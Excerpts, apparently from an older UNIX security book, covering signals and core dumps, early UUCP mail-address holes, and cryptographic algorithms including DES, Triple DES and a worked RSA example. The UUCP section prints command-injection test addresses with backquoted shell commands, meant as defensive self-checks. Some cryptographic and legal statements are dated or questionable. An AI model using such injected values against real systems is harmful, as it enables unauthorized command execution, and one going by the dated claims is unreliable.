Many signals, including SIGTERM, can be caught by programs. With a caught signal, a programmer has three choices of action:


●   Ignore it.

●   Perform the default action.

●   Execute a program-specified function.

There are two signals that cannot be caught: signal 9 (SIGKILL) and signal 17 (SIGSTOP).
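To make the three choices concrete, here is a short illustrative Python program (Python's signal module is a thin wrapper around the UNIX signal interface): it ignores SIGHUP, installs a handler for SIGTERM, and leaves SIGINT at its default action; the attempt to catch SIGKILL fails, as it must:

# Illustrative only: the three possible dispositions of a caught signal.
import os
import signal
import time

def on_sigterm(signum, frame):
    # Choice 3: execute a program-specified function.
    print("caught SIGTERM, cleaning up before exit")
    raise SystemExit(0)

signal.signal(signal.SIGHUP, signal.SIG_IGN)    # choice 1: ignore it
signal.signal(signal.SIGTERM, on_sigterm)       # choice 3: handle it
# SIGINT is left untouched: choice 2, perform the default action.

# SIGKILL can never be caught or ignored; the kernel rejects the attempt.
try:
    signal.signal(signal.SIGKILL, on_sigterm)
except (OSError, RuntimeError, ValueError):
    print("SIGKILL cannot be caught")

print("PID %d waiting; try kill -HUP, kill -TERM, or kill -9" % os.getpid())
while True:
    time.sleep(60)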

One signal that is very often sent is signal 1 (SIGHUP), which simulates a hangup on a modem. Standard practice when killing a process is to first send signal 1 (hangup); if the process does not terminate, send it signal 15 (software terminate); and finally send signal 9 (sure kill).
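That escalation is easy to script. The following sketch (Python; the five-second grace period is an arbitrary choice) sends SIGHUP, then SIGTERM, then SIGKILL, checking after each signal whether the process is still alive:

# A sketch of the escalating-kill practice described above.
import os
import signal
import time

def kill_gently(pid, grace=5):
    for sig in (signal.SIGHUP, signal.SIGTERM, signal.SIGKILL):
        try:
            os.kill(pid, sig)
        except ProcessLookupError:
            return True                  # process already gone
        time.sleep(grace)
        try:
            os.kill(pid, 0)              # signal 0 only checks existence
        except ProcessLookupError:
            return True
    return False                         # still alive even after SIGKILL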

Sometimes simply killing a rogue process is the wrong thing to do: you can learn more about a process by stopping it and examining it with some of UNIX's debugging tools than by "blowing it out of the water." Sending a process a SIGSTOP will stop the process but will not destroy its memory image.

Under most modern versions of UNIX, you can use the gcore program to generate a core file of a running process, which you can then examine at your leisure with adb (a debugger), dbx (another debugger), or gdb (yet another debugger). If you simply want to get an idea of what the process was doing, you can run strings (a program that finds printable strings in a binary file) over the core image to see which files it was referencing.

A core file is a specially formatted image of the memory being used by the process at the time the signal was caught. By examining the core file, you can see what routines were being executed, register values, and more. You can also fill your disk with a core file - be sure to look at the memory size of the process with the ps command before you try to get its core image!

NOTE: Some versions of UNIX name core files core.####, where #### is the PID of the process that generated the core file, or name.core, where name is the name of the program's executable.

Programs that you run may also dump core if they receive one of the signals that causes a core dump. On systems without a gcore program, you can send a SIGEMT or SIGSYS signal to cause the program to dump core. That method will work only if the process is currently in a directory where it can write, if it has not redefined the action to take on receiving the signal, and if the core file will not be larger than the core file limits imposed for the process's UID. If you use this approach, you will also be faced with the problem of finding where the process left the core file!



Chapter 15
UUCP

15.7 Early Security Problems with UUCP

UUCP is one of the oldest major subsystems of the UNIX operating system (older than the csh), and it has had its share of security holes. All of the known security problems have been fixed in recent years. Unfortunately, there are still some old versions of UUCP in use.

The main UUCP security problems were most easily triggered by sending mail messages to addresses other than valid user names. In one version of UUCP, mail could be sent directly to a file; in another version, mail could be sent to a special address that caused a command to be executed - sometimes as root! Both of these holes pose obvious security problems.[8]

[8] Interestingly enough, these same problems reappeared in the sendmail program in recent years. People designing software don't seem to be very good about learning from the past.

Fortunately, you can easily check whether the version of UUCP you are running contains these flaws. If it does, get a software upgrade, or disable your version of UUCP. A current version of BNU UUCP can be licensed from AT&T if your vendor doesn't have one.

To check your version of UUCP, follow the steps outlined here:

1.  Your mail system should not allow mail to be sent directly to a file. Mailers that deliver directly to files can be used to corrupt system databases or application programs. You can test whether or not your system allows mail to be sent to a file with the command sequence:

    $ mail /tmp/mailbug
    this is a mailbug file test
    ^D

    If the file mailbug appears in the /tmp directory, then your mailer is insecure. If your mailer returns a mail message to you with an error notification (usually containing a message like "cannot deliver to a file"), then your mail program does not contain this error. You should try this test with /bin/mail, /bin/rmail, and any other mail delivery program on your system.

2.  Your UUCP system should not allow commands to be encapsulated in addresses. This bug arises from the fact that some early uuxqt implementations used the system() library function to spawn commands (including mail). Mail sent to an address containing a backquoted command string would cause that command string to be executed before the mail was delivered. (A short illustration of why spawning commands through a shell is dangerous follows this list.) You can test whether or not your system executes commands encapsulated in addresses with the command sequence:

    $ uux - mail 'root `/bin/touch /tmp/foo`'
    this is a mailbug command test
    ^D
    $ uux - mail 'root & /bin/touch /tmp/foo'
    this is another test
    ^D

    The system should return mail with a message saying that /bin/touch /tmp/foo is an unknown user. If the mailer executed the touch - you can tell because a foo file will be created in your /tmp directory - then your uux program is insecure. Get a new version from your vendor.

3.  Check both types of addresses described earlier for mail that is sent by UUCP as well as for mail that originates locally on your system. For example, if the machines prose and idr are connected by UUCP, log onto idr and try:

    $ mail 'prose!/tmp/send1'
    Subject: This is a mailbug test
    Test
    ^D
    $ mail 'prose!`/bin/touch /tmp/foo`'
    Subject: This is a mailbug test #2
    Another test.
    ^D
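The root of the problem in step 2 is passing attacker-supplied text to a shell. The following Python sketch is not UUCP code, only an illustration; it contrasts the dangerous system()-style pattern with the safer approach of passing the address as a single argument that no shell ever parses:

# Illustrative sketch (not UUCP code) of why spawning commands through a
# shell, as early uuxqt implementations did via system(), is dangerous.
import subprocess

address = "root `/bin/touch /tmp/foo`"       # hostile "address"

# Dangerous pattern: a shell parses the string, so the backquoted command
# would run with the privileges of the calling program.
#   subprocess.run("mail " + address, shell=True)     # do NOT do this

# Safer pattern: pass the address as one element of an argument vector;
# no shell ever sees it, so backquotes and '&' remain literal text.
subprocess.run(["echo", "would deliver to:", address], check=True)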



Chapter 6
Cryptography

6.4 Common Cryptographic Algorithms

There are two basic kinds of encryption algorithms in use today:

●   Private key cryptography, which uses the same key to encrypt and decrypt the message. This type is also known as symmetric key cryptography.

●   Public key cryptography, which uses a public key to encrypt the message and a private key to decrypt it. The name public key comes from the fact that you can make the encryption key public without compromising the secrecy of the message or the decryption key. Public key systems are also known as asymmetric key cryptography.

Private key cryptography is most often used for protecting information stored on a computer's hard disk, or for encrypting information carried by a communications link between two different machines. Public key cryptography is most often used for creating digital signatures on data, such as electronic mail, to certify the data's origin and integrity.

This analysis gives rise to a third kind of system:

●   Hybrid public/private cryptosystems. In these systems, slower public key cryptography is used to exchange a random session key, which is then used as the basis of a private key algorithm. (A session key is used only for a single encryption session and is then discarded.) Nearly all practical public key cryptography implementations are actually hybrid systems.
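The hybrid structure is simple to sketch. In the toy Python example below, textbook RSA numbers (n = 3233, e = 17, d = 2753) stand in for the public key algorithm and a repeating-key XOR stands in for the private key algorithm; neither is secure, and both are assumptions made purely for illustration:

# Toy sketch of a hybrid cryptosystem: a slow "public key" step moves a
# random session key, and a fast "private key" step encrypts the data.
import os
from itertools import cycle

N, E, D = 3233, 17, 2753                 # tiny textbook RSA key pair

def xor_stream(key, data):
    # Repeating-key XOR, standing in for a real private key cipher.
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

# Sender: pick a random session key, wrap it with the public key,
# and encrypt the message with the session key.
session_key = os.urandom(8)
wrapped = [pow(b, E, N) for b in session_key]            # public key step
ciphertext = xor_stream(session_key, b"attack at dawn")  # private key step

# Recipient: unwrap the session key with the secret key, then decrypt.
recovered = bytes(pow(c, D, N) for c in wrapped)
assert xor_stream(recovered, ciphertext) == b"attack at dawn"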

6.4.1 Summary of Private Key Systems

The following list summarizes the private key systems in common use today.

ROT13
    A simple cryptographic algorithm which is used, among other things, to obscure the content of risqué jokes on various Usenet groups. The ROT13 encryption algorithm has no key, and it is not secure.

crypt
    The original UNIX encryption program, which is modeled on the German Enigma encryption machine. crypt uses a variable-length key. Some programs can automatically decrypt crypt-encrypted files without prior knowledge of the key or the plaintext. crypt is not secure. (This program should not be confused with the secure one-way crypt() function that UNIX uses for encrypting passwords.)

DES
    The Data Encryption Standard (DES), an encryption algorithm developed in the 1970s by the National Bureau of Standards (since renamed the National Institute of Standards and Technology, or NIST) and IBM. DES uses a 56-bit key.[8]

    [8] Technically, we should refer to it as the DEA: Data Encryption Algorithm. Standard-conforming implementations are certified by NIST, and usually require a hardware implementation. However, nearly everyone refers to it as the DES, so we will too.

RC2
    A block cipher originally developed by Ronald Rivest and kept as a trade secret by RSA Data Security. This algorithm was revealed by an anonymous Usenet posting in 1996 and appears to be reasonably strong (although there are some particular keys that are weak). RC2 is sold with an implementation that allows keys between 1 and 2048 bits. The RC2 key length is often limited to 40 bits in software that is sold for export.[9]

    [9] Unfortunately, a 40-bit key is vulnerable to a brute force attack.

RC4
    A stream cipher originally developed by Ronald Rivest and kept as a trade secret by RSA Data Security. This algorithm was revealed by an anonymous Usenet posting in 1994 and appears to be reasonably strong (although there are some particular keys that are weak). RC4 is sold with an implementation that allows keys between 1 and 2048 bits. The RC4 key length is often limited to 40 bits in software that is sold for export.[10]

    [10] Unfortunately, a 40-bit key is vulnerable to a brute force attack.

RC5
    A block cipher developed by Ronald Rivest and published in 1994. RC5 allows a user-defined key length, data block size, and number of encryption rounds.

IDEA
    The International Data Encryption Algorithm (IDEA), developed in Zurich, Switzerland, by James L. Massey and Xuejia Lai and published in 1990. IDEA uses a 128-bit key and is believed to be quite strong. IDEA is used by the popular program PGP (described later in this chapter) to encrypt files and electronic mail. Unfortunately,[11] wider use of IDEA may be hampered by a series of software patents on the algorithm, currently held by Ascom-Tech AG in Solothurn, Switzerland. Ascom-Tech supposedly will allow IDEA to be used royalty free in implementations of PGP outside the U.S., but concerned users should verify the terms with Ascom-Tech or their licensees directly.

    [11] Although we are generally in favor of intellectual property protection, we are opposed to the concept of software patents, in part because they hinder the development and use of innovative software by individuals and small companies.

Skipjack
    A classified (SECRET) algorithm developed by the National Security Agency (NSA). Reportedly, a Top Secret security clearance is required to see the algorithm's source code and design specifications. Skipjack is the algorithm used by the Clipper encryption chip. It uses an 80-bit key.

6.4.2 Summary of Public Key Systems

The following list summarizes the public key systems in common use today:

Diffie-Hellman
    A system for exchanging cryptographic keys between active parties. Diffie-Hellman is not actually a method of encryption and decryption, but a method of developing and exchanging a shared private key over a public communications channel. In effect, the two parties agree on some common numerical values, and then each party creates a key. Mathematical transformations of the keys are exchanged. Each party can then calculate a third session key that cannot easily be derived by an attacker who knows both exchanged values.

    Several versions of this protocol exist, involving differing numbers of parties and different transformations. Particular care must be exercised in the choice of some of the numbers and calculations used, or the exchange can be easily compromised. If you are interested, consult the references for all the gory details.

    The Diffie-Hellman algorithm is frequently used as the basis for exchanging cryptographic keys for encrypting a communications link. The key may be any length, depending on the particular implementation used. Longer keys are generally more secure.

RSA
    The well-known public key cryptography system developed by (then) MIT professors Ronald Rivest and Adi Shamir, and by USC professor Leonard Adleman. RSA can be used both for encrypting information and as the basis of a digital signature system. Digital signatures can be used to prove the authorship and authenticity of digital information. The key may be any length, depending on the particular implementation used. Longer keys are generally considered to be more secure.

ElGamal
    Another algorithm based on exponentiation and modular arithmetic. ElGamal may be used for encryption and digital signatures, in a manner similar to the RSA algorithm. Longer keys are generally considered to be more secure.

DSA
    The Digital Signature Algorithm, developed by the NSA and adopted as a Federal Information Processing Standard (FIPS) by NIST. Although the DSA key may be any length, only keys between 512 and 1024 bits are permitted under the FIPS. As specified, DSA can be used only for digital signatures, although it is possible to use DSA implementations for encryption as well. The DSA is sometimes referred to as the DSS, in the same manner as the DEA is usually referred to as the DES.

Table 6.1 lists all of the private and public key algorithms we've discussed.

Table 6.1: Commonly Used Private and Public Key Cryptography Algorithms

Algorithm        Description

Private Key Algorithms:
ROT13            Keyless text scrambler; very weak.
crypt            Variable key length stream cipher; very weak.[12]
DES              56-bit block cipher; patented, but freely usable (but not exportable).
RC2              Variable key length block cipher; proprietary.
RC4              Variable key length stream cipher; proprietary.
RC5              Variable key length block cipher; proprietary.
IDEA             128-bit block cipher; patented.
Skipjack         80-bit stream cipher; classified.

Public Key Algorithms:
Diffie-Hellman   Key exchange protocol; patented.
RSA              Public key encryption and digital signatures; patented.
ElGamal          Public key encryption and digital signatures; patented.
DSA              Digital signatures only; patented.

[12] Actually, crypt is a fair cipher for files of length less than 1024 bytes. Its recurrence properties only surface when used on longer inputs, thus providing more information for decrypting.

The following sections provide some technical information about a few of the algorithms mentioned above. If you are only interested in using encryption, you can skip ahead to the section called "Encryption Programs Available for UNIX" later in this chapter.

6.4.3 ROT13: Great for Encoding Offensive Jokes

ROT13 is a simple substitution cipher[13] that is traditionally used for distributing potentially objectionable material on the Usenet, a worldwide bulletin board system. It is a variation on the Caesar Cipher, an encryption method used by Caesar's troops thousands of years ago. In the ROT13 cipher, each letter of the alphabet is replaced with the letter that is 13 letters further along in the alphabet (with A following Z). Letters encrypt as follows:

[13] Technically, it is an encoding scheme - the "rotation" is fixed, and it does a constant encoding from a fixed alphabet.

Plaintext    Ciphertext
A            N
B            O
...          ...
M            Z
N            A
...          ...
Z            M

ROT13 used to be the most widely used encryption system in the UNIX world. However, it is not secure at all. Many news- and mail-reading programs automatically decrypt ROT13-encoded text with a single keystroke. Some people are known to be able to read ROT13 text without any machine assistance whatsoever.

For example, here is a ROT13 message:

Jung tbrf nebhaq, pbzrf nebhaq.

And here is how the message decrypts:

What goes around, comes around.

If you are not blessed with the ability to read ROT13 files without computer assistance, you can use the following command to either encrypt or decrypt files with the ROT13 algorithm:[14]

[14] On some versions of UNIX, you will need to remove the "[ ]" symbols.

% tr "[a-z][A-Z]" "[n-z][a-m][N-Z][A-M]" < filename
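The same transformation is available in Python's standard library, if you find that more convenient than tr:

# ROT13 using the rot_13 codec that ships with Python's standard library.
import codecs

print(codecs.encode("What goes around, comes around.", "rot_13"))
# prints: Jung tbrf nebhaq, pbzrf nebhaq.   (encoding and decoding are identical)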


Needless to say, do not use ROT13 as a means of protecting your files! The only real use for this "encryption" method is the one to which it is put on the Usenet: to keep someone who does not want to be exposed to material (such as the answer to a riddle, a movie spoiler in a review, or an offensive joke) from reading it inadvertently.

6.4.4 DES

One of the most widely used encryption systems today is the Data Encryption Standard (DES), developed in the 1970s and patented by researchers at IBM. The DES was an outgrowth of another IBM cipher known as Lucifer. IBM made the DES available for public use, and the federal government issued Federal Information Processing Standard Publication (FIPS PUB) Number 46 in 1977 describing the system. Since that time, the DES has been periodically reviewed and reaffirmed (most recently on December 30, 1993, as FIPS PUB 46-2, which runs until 1998). It has also been adopted as an American National Standard (X3.92-1981/R1987).

The DES performs a series of bit permutation, substitution, and recombination operations on blocks containing 64 bits of data and 56 bits of key (eight 7-bit characters). The 64 bits of input are permuted initially and are then input to a function using static tables of permutations and substitutions (called S-boxes). The bits are permuted in combination with 48 bits of the key in each round. This process is iterated 16 times (rounds), each time with a different set of tables and different bits from the key. The algorithm then performs a final permutation, and 64 bits of output are provided. The algorithm is structured in such a way that changing any bit in the input has a major effect on almost all of the output bits. Indeed, the output of the DES function appears so unrelated to its input that the function is sometimes used as a random number generator.

Although there is no standard UNIX program that performs encryption using the DES, some vendors' versions of UNIX include a program called des which performs DES encryption. (This command may not be present in international versions of the operating system, as described in the next section.)

6.4.4.1 Use and export of DES

The DES was mandated as the encryption method to be used by all federal agencies in protecting sensitive but not classified information.[15] The DES is heavily used in many financial and communication exchanges. Many vendors make DES chips that can encode or decode information fast enough to be used in data-encrypting modems or network interfaces. Note that the DES is not (and has never been) certified as an encryption method that can be used with U.S. Department of Defense classified material.

[15] Other algorithms developed by the NSA are designed for use with classified information.

Export control rules restrict the export of hardware or software implementations of the DES, even though the algorithm has been widely published and implemented many times outside the United States. If you have the international version of UNIX, you may find that your system lacks a des command. If you find yourself in this position, don't worry; good implementations of the DES can be obtained via anonymous FTP from almost any archive service, including the Usenet comp.sources archives.

For more information about export of cryptography, see "Encryption and U.S. Law," later in this chapter.

6.4.4.2 DES modes

FIPS PUB 81 explains how the DES algorithm can be used in four modes:

●   Electronic Code Book (ECB)

●   Cipher Block Chaining (CBC)

●   Cipher Feedback (CFB)

●   Output Feedback (OFB)

Each mode has particular advantages in some circumstances, such as when transmitting text over a noisy channel, or when it is necessary to decrypt only a portion of a file. The following provides a brief discussion of these four methods; consult FIPS PUB 81 or a good textbook on cryptography for details. (A short sketch contrasting ECB and CBC follows the list below.)

●   ECB Mode. In electronic code book (ECB) mode, each block of the input is encrypted using the same key, and the output is written as a block. This method performs simple encryption of a message, a block at a time. This method may not indicate when portions of a message have been inserted or removed. It works well with noisy transmission channels - alteration of a few bits will corrupt only a single 64-bit block.

●   CBC Mode. In cipher block chaining (CBC) mode, the plaintext is first XORed with the encrypted value of the previous block. Some known value (usually referred to as the initialization vector, or IV) is used for the first block. The result is then encrypted using the key. Unlike ECB mode, long runs of repeated characters in the plaintext will be masked in the output. CBC mode is the default mode for Sun Microsystems' des program.

●   CFB Mode. In cipher feedback (CFB) mode, the output is fed back into the mechanism. After each block is encrypted, part of it is shifted into a shift register. The contents of this shift register are encrypted with the user's key value using (effectively) ECB mode, and this output is XORed with the data stream to produce the encrypted result. This method is self-synchronizing, and enables the user to decrypt only a portion of a large database by starting a fixed distance before the start of the desired data.

●   OFB Mode. In output feedback (OFB) mode, the output is also fed back into the mechanism. A register is initialized with some known value (again, the IV). This register is then encrypted with (effectively) ECB mode using the user's key. The result is used as the key to encrypt the data block (using an XOR operation), and it is also stored back into the register for use on the next block. The algorithm effectively generates a long stream of key bits that can be used to encrypt/decrypt communication streams, with good tolerance for small bit errors in the transmission. This mode is almost never used in UNIX-based systems.
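Here is the promised sketch contrasting ECB and CBC. The toy_E function below is not DES; it merely XORs each 8-byte block with a fixed key. The chaining structure is the same, however, and it shows why identical plaintext blocks leak through ECB but not through CBC:

# A toy illustration of ECB versus CBC chaining on 8-byte blocks.
KEY = b"\x13\x37\xc0\xff\xee\x42\x99\x01"
IV  = b"\x00" * 8

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def toy_E(block):                     # stand-in for DES encryption
    return xor(block, KEY)

def ecb_encrypt(blocks):
    return [toy_E(b) for b in blocks]

def cbc_encrypt(blocks, iv=IV):
    out, prev = [], iv
    for b in blocks:
        prev = toy_E(xor(b, prev))    # chain each block into the next
        out.append(prev)
    return out

blocks = [b"ATTACKAT", b"ATTACKAT"]   # identical plaintext blocks
print(ecb_encrypt(blocks))            # identical ciphertext blocks leak structure
print(cbc_encrypt(blocks))            # chaining masks the repetition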

All of these modes require that byte and block boundaries remain synchronized between the sender and recipient. If information is inserted into or removed from the encrypted data stream, it is likely that all of the data following the point of modification will be rendered unintelligible.

6.4.4.3 DES strength

Ever since the DES was first proposed as a national standard, some people have been suspicious of the algorithm. DES was based on a proprietary encryption algorithm developed by IBM called Lucifer, which IBM had submitted to the National Bureau of Standards (NBS)[16] for consideration as a national cryptographic standard. But whereas Lucifer had a key that was 112 bits long, the DES key was shortened to 56 bits at the request of the National Security Agency. The NSA also requested that certain changes be made in the algorithm's S-boxes. Many people suspected that the NSA had intentionally weakened the Lucifer algorithm, so that the final standard adopted by NBS would not pose a threat to the NSA's ongoing intelligence collection activities. But nobody had any proof.

[16] NBS later became the National Institute of Standards and Technology.

Today the DES is more than 20 years old, and the algorithm is definitely showing its age. Recently Michael Wiener, a researcher at Bell-Northern Research, published a paper detailing how to build a machine capable of decrypting DES-encrypted messages by conducting an exhaustive key search. Such a machine could be built for a few million dollars and could break any DES-encrypted message in about a day. We can reasonably assume that such machines have been built by both governments and private industry.


In June 1994, IBM published a paper describing the design criteria of the DES. The paper claims that the choices of the DES key size, S-boxes, and number of rounds were a direct result of the conflicting goals of making the DES simple enough to fit onto a single chip with 1972 chip-making technology and of making it resistant to differential cryptanalysis.

These two papers, coupled with many previously published analyses, appear to have finally settled a long-running controversy as to whether or not the NSA had intentionally built weaknesses into the DES. The NSA didn't build a back door into DES that would have allowed it to forcibly decrypt any DES-encrypted transmission: it didn't need to. Messages encrypted with DES can be forcibly decrypted simply by trying every possible key, given the appropriate hardware.

6.4.5 Improving the Security of DES

You can improve the security of DES by performing multiple encryptions, known as superencryption. The two most common ways of doing this are double encryption (Double DES) and triple encryption (Triple DES).

While Double DES appears to add significant security, research has found some points of attack; experts therefore recommend Triple DES for applications where single DES is not adequate.

6.4.5.1 Double DES

In Double DES, each 64-bit block of data is encrypted twice with the DES algorithm, first with one key, then with another, as follows:

1.  Encrypt with (key 1).

2.  Encrypt with (key 2).

plaintext -> DES(key1) -> DES(key2) -> ciphertext

Double DES is not significantly more secure than single DES. In 1981, Ralph Merkle and Martin Hellman published an article[17] in which they outlined a so-called "meet-in-the-middle" attack.

[17] R. C. Merkle and M. Hellman, "On the Security of Multiple Encryption," Communications of the ACM, Volume 24, Number 7, July 1981, pp. 465-467.

The meet-in-the-middle attack is a known-plaintext attack which requires that an attacker have both a known piece of plaintext and a block of that same text that has been encrypted. (These pieces are surprisingly easy to get.) The attack requires storing 2^56 intermediate results when trying to crack a message that has been encrypted with DES (a total of 2^59 bytes), but it reduces the number of different keys you need to check from 2^112 to 2^57. "This is still considerably more memory storage than one could comfortably comprehend, but it's enough to convince the most paranoid of cryptographers that double encryption is not worth anything," writes Bruce Schneier in his landmark volume, Applied Cryptography.

In other words, because a message encrypted with DES can be forcibly decrypted by an attacker performing an exhaustive key search today, an attacker might also be able to forcibly decrypt a message encrypted with Double DES using a meet-in-the-middle attack at some point in the future.
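A toy version of the attack makes the bookkeeping clear. The sketch below uses an invented 8-bit XOR-and-rotate "cipher" with an 8-bit key, so the whole key space is only 256 keys; the same table-building idea is what reduces the Double DES search from 2^112 to roughly 2^57:

# A toy meet-in-the-middle attack on double encryption.
def toy_encrypt(key, block):
    x = (block ^ key) & 0xFF
    return ((x << 3) | (x >> 5)) & 0xFF       # rotate left by 3

def toy_decrypt(key, block):
    x = ((block >> 3) | (block << 5)) & 0xFF  # rotate right by 3
    return (x ^ key) & 0xFF

def double_encrypt(k1, k2, block):
    return toy_encrypt(k2, toy_encrypt(k1, block))

# A known plaintext/ciphertext pair produced with secret keys (k1, k2).
k1, k2 = 0x3A, 0xC5
plain = 0x41
cipher = double_encrypt(k1, k2, plain)

# Meet in the middle: encrypt the plaintext under every possible first key
# (256 operations, 256 stored values), then decrypt the ciphertext under
# every possible second key and look for a match.  That is about 2^9 steps
# instead of 2^16 for a naive search of all key pairs.
middle = {toy_encrypt(a, plain): a for a in range(256)}
candidates = [(middle[toy_decrypt(b, cipher)], b)
              for b in range(256) if toy_decrypt(b, cipher) in middle]

# The real key pair is among the candidates; additional known
# plaintext/ciphertext pairs would be used to narrow the list further.
assert (k1, k2) in candidates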

6.4.5.2 Triple DES

The dangers of the Merkle-Hellman meet-in-the-middle attack can be circumvented by performing three block encryption operations. This method is called Triple DES.

In practice, the most common way to perform Triple DES is:

1.  Encrypt with (key1).

2.  Decrypt with (key2).

3.  Encrypt with (key3).

The advantage of this technique is that it can be backward compatible with single DES, simply by setting all three keys to the same value.

To decrypt, reverse the steps:

1.  Decrypt with (key3).

2.  Encrypt with (key2).

3.  Decrypt with (key1).

For many applications, you can use the same key for both key1 and key3 without creating a significant vulnerability.

Triple DES appears to be roughly as secure as single DES would be if it had a 112-bit key. How secure is this<br />

really? Suppose you had an integrated circuit which could perform one million Triple DES encryptions per<br />

second, and you built a massive computer containing one million of these chips to forcibly try all Triple DES<br />

keys. This computer, capable of testing 10^12 encryptions per second, would require:

2^112 = 5.19 x 10^33 encryption operations

5.19 x 10^33 encryption operations / 10^12 operations/sec = 5.19 x 10^21 sec = 1.65 x 10^14 years

This is more than 16,453 times the currently estimated age of the universe (approximately 10^10 years).
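The arithmetic is easy to reproduce; the following few lines of Python redo the estimate (the chip counts come from the text, the seconds-per-year constant is the only thing added):

# Brute-force search time for the full Triple DES key space.
keys_to_try = 2**112                    # effective Triple DES key space
tests_per_second = 10**6 * 10**6        # one million chips x one million tests
seconds = keys_to_try / tests_per_second
years = seconds / (365.25 * 24 * 3600)
print(f"{keys_to_try:.3g} operations, about {years:.3g} years")
# prints roughly 5.2e+33 operations, about 1.6e+14 years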

Apparently, barring new discoveries uncovering fundamental flaws or weaknesses with the DES algorithm, or<br />

new breakthroughs in the field of cryptanalysis, Triple DES is the most secure private key encryption algorithm<br />

that humanity will ever need (although niche opportunities may exist for faster algorithms).<br />

6.4.6 RSA and Public Key Cryptography<br />

RSA is the most widely known algorithm for performing public key cryptography. The algorithm is named after<br />

its inventors, Ronald Rivest, Adi Shamir, and Leonard Adleman, who made their discovery in the spring of 1977.<br />

Unlike DES, which uses a single key, RSA uses two cryptographic keys: a public key and a secret key. The<br />

public key is used to encrypt a message and the secret key is used to decrypt it. (The system can also be run in<br />

reverse, using the secret key to encrypt data that can be decrypted with the public key.)<br />

The RSA algorithm is covered by U.S. Patent 4,405,829 ("Cryptographic Communications System and Method"),<br />

which was filed for on December 14, 1977; issued on September 20, 1983; and expires on September 20, 2000.<br />

Because a description of the algorithm was published before the patent application was filed, RSA can be used<br />

without royalty everywhere in the world except the United States (international patent laws have different<br />

coverage of prior disclosure and patent applicability).[18] Not surprisingly, RSA is significantly more popular in<br />


Europe and Japan than in the United States, although its popularity in the U.S. is increasing.<br />

[18] Ongoing controversy exists over whether this, or any other patent granted on what amounts to a<br />

series of mathematical transformations, can properly be patented. Some difference of opinion also<br />

exists about the scope of the patent protection. We anticipate that the courts will need a lot of time to<br />

sort out these issues.<br />

6.4.6.1 How RSA works<br />

The strength of RSA is based on the difficulty of factoring a very large number. The following brief treatment<br />

does not fully explain the mathematical subtleties of the algorithm. If you are interested in more detail, you can<br />

consult the original paper[19] or a text such as those listed in Appendix D.<br />

[19] Rivest, R., Shamir, A., Adleman, L., "A Method for Obtaining Digital Signatures and Public<br />

Key Cryptosystems," Communications of the ACM, Volume 21, Number 2, February 1978.<br />

RSA is based on well-known, number-theoretic properties of modular arithmetic and integers. One property<br />

makes use of the Euler Totient Function, φ(n). The Totient function of a number n is defined as the count of

integers less than that number that are relatively prime to that number. (Two numbers are relatively prime if they<br />

have no common factors; for example, 9 and 8 are relatively prime.) The Totient function for a prime number is<br />

one less than the prime number itself: every positive integer less than the number is relatively prime to it.<br />

The property used by RSA was discovered by Euler and is this: any integer i relatively prime to n, raised to the power of φ(n) and taken mod n, is equal to 1. That is:

i^φ(n) mod n = 1

Suppose e and d are random integers that are inverses modulo φ(n), that is:

e x d mod φ(n) = 1

A related property used in RSA was also discovered by Euler. His theorem says that if M is any number relatively prime to n, then:

(M^e)^d mod n = M and (M^d)^e mod n = M

Cryptographically speaking, if M is part of a message, we have a simple means for encoding it with one function:

s = M^e mod n

and decoding it with another function:

M = s^d mod n

So how do we get appropriate values for n, e, and d? First, two large prime numbers p and q, of approximately<br />

the same size, are chosen, using some appropriate method. These numbers should be large - on the order of<br />

several hundred digits - and they should be kept secret.<br />

Next, the Euler Totient function φ(pq) is calculated. In the case of n being the product of two primes, φ(pq) = (p - 1)(q - 1) = φ(n).

Next, we pick a value e that is relatively prime to φ(n). A good choice would be to pick something in the interval max(p + 1, q + 1) < e < φ(n). We then compute d as the modular inverse of e mod φ(n). If d should happen to be too small (i.e., less than about log2(n)), we pick another e and d.

Now we have our keys. To encrypt a message m, we split m into fixed-size integers M less than n. Then we find<br />

the value M^e mod n = s for each portion of the message. This calculation can be done quickly with hardware, or with software using special algorithms. These values are concatenated to form the encrypted message. To decrypt the message, it is split into the blocks, and each block is decrypted as s^d mod n = M.

6.4.6.2 An RSA example<br />

For this example, assume we pick two prime numbers p and q:<br />

p = 251<br />

q = 269<br />

The number n is therefore:<br />

n = 251 * 269 = 67519<br />

The Euler Totient function for this value is:<br />

φ(n) = (251 - 1)(269 - 1) = 67000

Let's arbitrarily pick e as 50253. d is then:<br />

d = e^-1 mod 67000 = 27917

because:<br />

50253 * 27917 = 1402913001 = 20939 * 67000 + 1 = 1 ( mod 67000 )<br />

Using n = 67519 allows us to encode any message M that is between 0 and 67518. We can therefore use this<br />

system to encode a text message two characters at a time. (Two characters have 16 bits, or 65536 possibilities.)<br />

Using e as our key, let's encode the message "RSA works!" The sequence of ASCII characters encoding "RSA<br />

works!" is shown in the following table<br />

Table 6.2: RSA Encoding Example<br />

ASCII   Decimal Value   Encoded Value
"RS"    21075           48467
"A "    16672           14579
"wo"    30575           26195
"rk"    29291           58004
"s!"    29473           30141


As you can see, the encoded values do not resemble the original message.<br />

To decrypt, we raise each of these numbers to the power of d and take the remainder mod n. After translating to<br />

ASCII, we get back the original message.<br />
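The whole example can be checked with a few lines of Python: pow(x, y, n) performs the modular exponentiation, and the two-character blocking is the same "first character times 256 plus second character" packing that turns "RS" into 21075. (The script itself is an illustration added here, not part of the original text; it needs Python 3.8 or later for pow(e, -1, phi).)

# rsa_example.py -- reproduces the small RSA example above.
p, q = 251, 269
n = p * q                         # 67519
phi = (p - 1) * (q - 1)           # 67000
e = 50253
d = pow(e, -1, phi)               # modular inverse of e mod phi: 27917

message = "RSA works!"
blocks = [ord(message[i]) * 256 + ord(message[i + 1])
          for i in range(0, len(message), 2)]

cipher = [pow(m, e, n) for m in blocks]       # encrypt: m^e mod n
decrypted = [pow(c, d, n) for c in cipher]    # decrypt: c^d mod n
recovered = "".join(chr(m // 256) + chr(m % 256) for m in decrypted)

print(blocks)        # [21075, 16672, 30575, 29291, 29473]
print(cipher)        # the encoded values
print(recovered)     # RSA works!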

When RSA is used for practical applications, it is used with numbers that are hundreds of digits long. Because<br />

doing math with hundred-digit-long strings is time consuming, modern public key applications are designed to<br />

minimize the number of RSA calculations that need to be performed. Instead of using RSA to encrypt the entire<br />


message, RSA is used to encrypt a session key, which itself is used to encrypt the message using a high-speed,<br />

private key algorithm such as DES or IDEA.<br />
